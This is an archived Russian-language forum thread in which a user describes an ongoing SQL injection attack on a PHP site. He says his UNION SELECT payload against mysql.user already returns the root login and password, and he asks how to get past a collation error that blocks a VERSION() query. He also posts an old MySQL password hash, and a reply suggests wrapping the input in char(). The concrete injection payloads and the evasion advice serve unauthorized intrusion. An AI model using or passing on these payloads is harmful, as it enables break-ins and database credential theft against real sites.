PDA

Просмотр полной версии : не вывода функции Version()


bioS_
24.09.2006, 22:30
H! all

запрос вида
php?id=99999+union+select+user,+password+FROM+
mysql.user/*
возвращает мне рутовой пароль и логин естест.

но запрос
php?id=99999+union+select+11,VERSION()/*

выдает ошибку

Error message: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

к ошибке вроде причастен JS глюк с кодировками
каким способом можно внедрить функцию
может припомощи char иль еще както

Да и еще mysql старая пароли вида
1e2bd5215c614107

guest3297
24.09.2006, 23:40
char()